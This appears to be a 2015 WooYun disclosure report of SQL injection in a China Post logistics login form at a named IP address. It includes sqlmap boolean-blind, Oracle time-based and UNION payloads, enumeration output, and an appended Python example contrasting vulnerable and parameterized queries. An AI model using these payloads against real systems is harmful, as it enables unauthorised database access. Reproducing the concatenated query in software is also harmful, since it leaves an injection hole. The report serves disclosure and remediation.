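Vulnerability summary

Bug ID: wooyun-2015-0118547

Title: SQL injection in a China Post logistics statistics system (affects 85 databases and a large amount of data)

Vendor: China Post Group Corporation, Information Technology Bureau

Author: YY-2012

Submitted: 2015-06-07 12:13

Fixed: 2015-07-23 10:56

Published: 2015-07-23 10:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]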

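Vulnerability details

Disclosure status:

2015-06-07: Details reported to the vendor; awaiting vendor handling
2015-06-08: Vendor confirmed; details disclosed to the vendor only
2015-06-18: Details disclosed to core white hats and experts in the relevant field
2015-06-28: Details disclosed to ordinary white hats
2015-07-08: Details disclosed to intern white hats
2015-07-23: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

China Post Express & Logistics statistics management system
http://121.28.6.5:8888/LoginAction.do?actionType=quit
The login form is vulnerable to SQL injection.

Proof of vulnerability: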

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: actionType=Getdw&username=admin' AND 5907=5907 AND 'sjDv'='sjDv
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: actionType=Getdw&username=admin' AND 4395=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(98)||CHR(68)||CHR(70),30) AND 'dbKq'='dbKq
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: actionType=Getdw&username=admin' UNION ALL SELECT CHR(113)||CHR(112)||CHR(106)||CHR(120)||CHR(113)||CHR(115)||CHR(110)||CHR(121)||CHR(68)||CHR(112)||CHR(98)||CHR(74)||CHR(106)||CHR(114)||CHR(109)||CHR(113)||CHR(122)||CHR(122)||CHR(107)||CHR(113),NULL FROM DUAL--
---
[00:17:11] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
[00:17:11] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[00:17:11] [INFO] fetching database (schema) names
available databases [85]:
[00:17:11] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\121.28.6.5'

Remediation:

Filtering

Copyright notice: when reposting, please credit the source YY-2012@WooYun
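
The `username` POST parameter flagged in the sqlmap output above, as an added example that is not part of the original report or the vendor's code: a string-concatenated lookup beside the same lookup with a bind variable, plus a regression check built on the boolean probe quoted in the report. SQLite stands in for the Oracle back end so the example runs offline; the table, columns and function names are hypothetical.

```python
import sqlite3

# Constructed stand-in for the login back end. The reported system uses Oracle;
# SQLite is used here only so the example runs offline. Table and column names
# are hypothetical.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, unit TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "HQ"), ("clerk", "Branch-01")])
    return conn

def get_units_concat(conn, username):
    """'Before' form: the POST value is spliced into the SQL text."""
    sql = "SELECT username, unit FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def get_units_bound(conn, username):
    """Hardened form: the value travels as a bind variable, never as SQL."""
    sql = "SELECT username, unit FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

# Boolean pair: the first string is the payload quoted in the sqlmap output;
# the second is its constructed always-false twin.
TRUE_PROBE = "admin' AND 5907=5907 AND 'sjDv'='sjDv"
FALSE_PROBE = "admin' AND 5907=5908 AND 'sjDv'='sjDv"

def answers_boolean_probe(lookup, conn):
    """Regression check: True if the result depends on the injected condition."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)

if __name__ == "__main__":
    db = make_db()
    for fn in (get_units_concat, get_units_bound):
        print(fn.__name__, "answers boolean probe:", answers_boolean_probe(fn, db))
```

With the bound form the probe strings are compared as literal usernames, so both return no rows and the true/false difference that the boolean-based technique relies on disappears.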


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-06-08 10:54

Vendor reply:

Thanks

Latest status:

None